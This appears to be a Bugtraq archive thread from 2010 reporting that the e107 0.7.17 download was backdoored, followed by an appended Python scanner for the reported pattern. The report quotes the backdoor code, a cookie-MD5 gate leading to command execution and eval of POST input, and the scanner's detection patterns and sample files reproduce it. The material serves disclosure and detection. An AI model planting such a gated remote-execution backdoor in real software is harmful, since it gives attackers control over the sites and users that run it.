Bugtraq mailing list archives
Re: e107 latest download link is backdoored
From: "Valery Marchuk" <vulns () securitylab ru>
Date: Mon, 25 Jan 2010 20:07:10 +0200
I've just checked the archive. The latest version of the file class2.php was changed on 2010/01/21 03:57:43 and it does not contain the malicious code. It has probably been replaced already, or we are using different mirrors.
Valery Marchuk
www.SecurityLab.ru

----- Original Message -----
From: "Bogdan Calin" <bogdan () acunetix com>
To: <full-disclosure () lists grok org uk>
Cc: <bugtraq () securityfocus com>
Sent: Monday, January 25, 2010 12:58 PM
Subject: e107 latest download link is backdoored

Hi guys,

The latest version of e107, version 0.7.17 contains a PHP backdoor.
http://e107.org/e107_files/downloads/e107_v0.7.17_full.zip

I've just downloaded this file and while looking through the code, I've found the following piece of code:

file: class2.php, line: 1876

    if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
    ...
    if(!empty($_POST['cmd'])){
        $out = execute($_POST['cmd']);
    }
    elseif(!empty($_POST['php'])){
        ob_start();
        eval($_POST['php']);
        $out = ob_get_contents();
        ob_end_clean();
    }
    ...

and so on.

I've informed the e107 guys about this situation. For now, that link is not safe.
Look at the file date, class2.php has been modified on 2010-01-23, 21:52:26

--
Bogdan Calin - bogdan () acunetix com
CTO
Acunetix Ltd. - http://www.acunetix.com
Acunetix Web Security Blog - http://www.acunetix.com/blog
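Added example, not part of either message and not e107 or Acunetix code: a Python check that scans a downloaded zip in place and reports, for each PHP member, its stored modification time and any line matching the backdoor pattern quoted above, so copies from different mirrors can be compared. The function names, rule names, the member path e107/class2.php and the sample file bodies are assumptions constructed for the illustration; only the MD5 literal and the two timestamps come from the thread.

```python
import io
import re
import zipfile

# The MD5 literal is the one quoted in the report; the other two rules are
# heuristics generalised from the quoted snippet (assumptions, not vendor signatures).
RULES = {
    "reported-hash": re.compile(r"cf1afec15669cb96f09befb7d70f8bcb", re.I),
    "cookie-md5-gate": re.compile(
        r"md5\s*\(\s*\$_COOKIE\s*\[[^\]]+\]\s*\)\s*={2,3}\s*[\"'][0-9a-f]{32}[\"']", re.I),
    "eval-of-request-data": re.compile(
        r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b", re.I),
}

def scan_archive(fileobj):
    """Scan every .php member of a zip without extracting it.
    Returns {member: {"modified": str, "hits": [(line_no, rule)]}} for members with hits."""
    findings = {}
    with zipfile.ZipFile(fileobj) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".php"):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            hits = [(no, name)
                    for no, line in enumerate(text.splitlines(), 1)
                    for name, rx in RULES.items() if rx.search(line)]
            if hits:
                stamp = "%04d-%02d-%02d %02d:%02d:%02d" % info.date_time
                findings[info.filename] = {"modified": stamp, "hits": hits}
    return findings

def make_sample(body, date_time):
    """Build a constructed in-memory archive holding one class2.php (hypothetical path)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(zipfile.ZipInfo("e107/class2.php", date_time), body)
    return buf

# Constructed samples: the timestamps are the two quoted in the thread,
# the bodies are minimal stand-ins, not the real class2.php.
BACKDOORED = make_sample(
    '<?php\nif(md5($_COOKIE[\'access-admin\']) == "cf1afec15669cb96f09befb7d70f8bcb") {\n'
    "  eval($_POST['php']);\n}\n", (2010, 1, 23, 21, 52, 26))
CLEAN = make_sample("<?php\n$pref = array();\n", (2010, 1, 21, 3, 57, 43))

if __name__ == "__main__":
    for label, sample in (("copy A", BACKDOORED), ("copy B", CLEAN)):
        print(label, scan_archive(sample))
```

For a real download, pass the path of the zip file to scan_archive instead of the in-memory samples.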